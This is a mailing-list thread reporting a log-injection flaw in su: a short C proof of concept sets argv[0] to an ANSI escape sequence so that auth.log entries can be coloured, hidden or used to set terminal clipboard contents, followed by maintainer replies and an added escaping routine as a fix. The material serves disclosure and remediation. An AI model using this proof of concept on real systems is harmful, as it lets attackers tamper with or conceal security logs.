Hi,

This seems to be a bug in util-linux, not shadow, so I've added util-linux@ to the thread. The discussion started in the email below, and was later continued in <https://github.com/shadow-maint/shadow/pull/960>.

Have a lovely day!
Alex

On Sat, Mar 02, 2024 at 11:33:16AM -0600, Serge E. Hallyn wrote:
> On Sat, Mar 02, 2024 at 11:34:07AM -0500, Skyler Ferrante (RIT Student) wrote:
> > Hi Serge,
> >
> > I was playing around with some of the shadow-utils binaries and I
> > realized that an unprivileged user can set argv[0] to contain escape
> > sequences, and then cause it to be logged in /var/log/auth.log.
> >
> > PoC
> > ```
> > #include <stdio.h>
> > #include <unistd.h>
> >
> > int main(int argc, char **my_argv)
> > {
> >     char *prog = "/usr/bin/su";
> >     /* argv[0] carries an ANSI colour escape; su logs it as the program name */
> >     char *argv[] = {"\033[33mYellow", "root", NULL};
> >     char *envp[] = {NULL};
> >
> >     execve(prog, argv, envp);
> >     /* only reached if execve() fails */
> >     printf("Failed to exec\n");
> >     return 1;
> > }
> > ```
> > Run the binary, and type an incorrect password for root. Now run `tail
> > /var/log/auth.log`. It should contain Yellow text. This can be used to
> > hide log contents (move the cursor/delete characters). Some terminals
> > also allow setting clipboard contents through escape sequences (my
> > terminal, windows-terminal, supports this).
> >
> > It may be a good idea to refuse argv[0] if it contains binary data.
> > You could also prevent this bug by not allowing an attacker to choose
> > Prog (e.g. su could just use "su" as Prog).
> >
> > If you don't think this is a bad enough security issue to hide, I can
> > post an issue on github. I would argue that you shouldn't cat auth.log
> > or view it from tail, but I know a lot of people do.
> >
> > Cheers,
> > Skyler
>
> Terminals can be a nuisance :)
>
> I don't think we need to hide this issue, but of course definitely address
> it. I'm Cc:ing the other maintainers in case they feel differently.
>
> Did you want to send a PR to fix it?
>
> Thanks,
> -serge

--
<https://www.alejandro-colomar.es/>
Looking for a remote C programming job at the moment.
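Added example, not code from shadow, util-linux or anyone on this thread: the check the thread proposes (refuse an argv[0] that carries binary data) beside a log-escaping routine that rewrites control bytes as `\xHH`, so a log line built from a caller-controlled string stays plain printable ASCII when viewed with cat or tail. The function names and buffer sizes are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Return 1 if s contains any byte outside printable ASCII (0x20..0x7e),
 * i.e. the "argv[0] contains binary data" condition the thread suggests rejecting. */
int has_binary(const char *s)
{
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        if (c < 0x20 || c > 0x7e)
            return 1;
    }
    return 0;
}

/* Copy s into out (capacity outsz), rewriting every non-printable byte and the
 * backslash itself as \xHH so the result is unambiguous and contains no terminal
 * control sequence. Returns the length the full escaped string needs (snprintf
 * style) so a caller can detect truncation; out is always NUL-terminated. */
size_t log_escape(const char *s, char *out, size_t outsz)
{
    size_t need = 0, w = 0;
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        char buf[5];
        size_t len;
        if (c < 0x20 || c > 0x7e || c == '\\') {
            snprintf(buf, sizeof buf, "\\x%02x", c);
            len = 4;
        } else {
            buf[0] = (char)c;
            len = 1;
        }
        if (outsz && w + len < outsz) {   /* keep room for the terminator */
            memcpy(out + w, buf, len);
            w += len;
        }
        need += len;
    }
    if (outsz)
        out[w] = '\0';
    return need;
}

/* Helper: escape s into a buffer of outsz bytes (<= 64) and compare with expected. */
int escape_equals(const char *s, size_t outsz, const char *expected)
{
    char out[64];
    log_escape(s, out, outsz);
    return strcmp(out, expected) == 0;
}

int main(void)
{
    const char *argv0 = "\033[33mYellow";   /* constructed: the PoC's argv[0] */
    char safe[64];
    log_escape(argv0, safe, sizeof safe);
    printf("binary=%d logged as: %s\n", has_binary(argv0), safe);
    return 0;
}
```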